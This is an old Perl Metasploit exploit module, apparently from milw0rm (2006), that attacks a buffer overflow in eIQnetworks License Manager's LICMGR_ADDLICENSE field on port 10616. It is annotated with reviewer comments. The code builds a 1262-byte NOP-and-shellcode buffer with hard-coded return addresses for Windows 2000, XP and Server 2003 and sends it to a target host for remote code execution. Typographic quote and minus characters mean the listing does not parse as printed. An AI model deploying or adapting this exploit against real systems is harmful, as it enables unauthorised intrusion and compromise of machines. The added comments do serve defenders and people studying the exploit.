
eIQnetworks License Manager Remote Buffer Overflow Exploit 1262

#!/usr/bin/perl −w

#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
#
# NOTE(review): this listing is a PDF rendering. The quote characters (’)
# and minus signs (−) are typographic; the code as printed will not parse,
# the original source used ASCII ' and -.
#
# Layout follows the Perl-based Msf::Exploit framework (Msf::/Pex::
# namespaces): a metadata hash ($info) that the base class consumes, plus
# new() and Exploit() below.

package Msf::Exploit::EiQ_License_1262;
use base "Msf::Exploit";
use strict;
use Pex::Text;

# No advanced options are exposed; the empty hash is passed through in new().
my $advanced = { };

# Module metadata: everything the framework shows the operator and uses to
# constrain payload generation comes from this hash.
my $info =
  {
        ’Name’         => ’EIQ License Manager Overflow’,
        ’Authors’    => [ ’ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com’ ],

        ’Arch’ => [ ’x86’ ],
        ’OS’    => [ ’win32’, ’win2000’, ’winxp’ ],
        ’Priv’ => 0,

        # Payload exit technique is fixed to ’seh’.
        ’AutoOpts’    => { ’EXITFUNC’ => ’seh’ },

        # Operator-settable options; presumably [required, type, description,
        # default]. RPORT defaults to 10616, the license manager's listener
        # as used by this module.
        ’UserOpts’ =>
          {
                  ’RHOST’ => [1, ’ADDR’, ’The target address’],
                  ’RPORT’ => [1, ’PORT’, ’The target port’, 10616],
         },
        # Payload constraints: at most 1262 bytes (the field size Exploit()
        # pads to) and none of the listed bytes. 0x26 is ’&’, the field
        # separator used on the wire; the others are presumably also
        # significant to the server's parser — unverified here.
        ’Payload’ =>
          {
                  ’Space’ => 1262,
                  ’BadChars’ => "\x00\x0a\x0d\x40\x26",
             },
          ’Description’ => Pex::Text::Freeform(qq{
        This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
        Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
        in size. This module should work on all rebranded eiq analysers. Exploitation
        assistance from KF of digital munition.
        }),


        # One fixed return address per OS/service-pack; the trailing comments
        # label the gadget type. Index 1 (Windows XP) is the default. Because
        # the addresses are build-specific, the module only applies to the
        # exact listed builds.
        ’DefaultTarget’ => 1,
        ’Targets’ =>
          [
                  [’Windows 2000 SP0−SP4 English’, 0x750316e2],      # call ebx
                  [’Windows XP English SP1/SP2’, 0x77db64dc ],             # jmp ebx
                  [’Windows Server 2003 English SP0/SP1’, 0x77d16764 ],   # jmp ebx
          ],

  };
   50
sub new {
      # Constructor: hands the module metadata and the (empty) advanced
      # options to the base class; any further arguments are forwarded as-is.
      my $class = shift;
      my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
      return($self);
}
   56
sub Exploit {
      # Builds and sends a single oversized LICMGR_ADDLICENSE request.
      # Returns nothing; the only output is via PrintLine. No response is
      # read, so success is not confirmed here.
      my $self = shift;
      my $target_host =    $self−>GetVar(’RHOST’);
      my $target_port =    $self−>GetVar(’RPORT’);
      my $target_idx =     $self−>GetVar(’TARGET’);
      my $shellcode   =    $self−>GetVar(’EncodedPayload’)−>Payload;
      my $target      =    $self−>Targets−>[$target_idx];      # [name, return address]
      # Pad the encoded payload to exactly 1262 bytes; this relies on the
      # framework honouring ’Space’ => 1262 from $info, there is no local check.
      my $nops        =    $self−>MakeNops(1262 − length($shellcode));
      my $ret         =     pack("V", $target−>[1]);            # 32-bit little-endian
      # Wire format: command name, ’&’, 1262-byte field, 4-byte address, ’&’.
      # For defenders: the literal "LICMGR_ADDLICENSE&" followed by a field of
      # about 1266 bytes before the next ’&’ is the detectable signature, and a
      # server-side bound on that field's length is the fix.
      my $evil        =    "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";


      # Plain TCP through the framework's socket wrapper. CPORT is not
      # declared in UserOpts above; presumably a framework-level option.
      my $s = Msf::Socket::Tcp−>new
        (
              ’PeerAddr’ => $target_host,
              ’PeerPort’ => $target_port,
              ’LocalPort’ => $self−>GetVar(’CPORT’),
        );

      if ($s−>IsError) {
            $self−>PrintLine(’[*] Error creating socket: ’ . $s−>GetError);
            return;
      }
      # The target name is concatenated into the sprintf format string; that is
      # only safe because names come from the static Targets table in $info.
      $self−>PrintLine(sprintf ("[*] Trying ".$target−>[0]." using return address 0x%.8x....", $target−>[1]));

      # "$evil" is a redundant stringification of an already-string scalar.
      $s−>Send("$evil");
      return;
}
   85
   86   # milw0rm.com [2006−07−26]





				
DOCUMENT INFO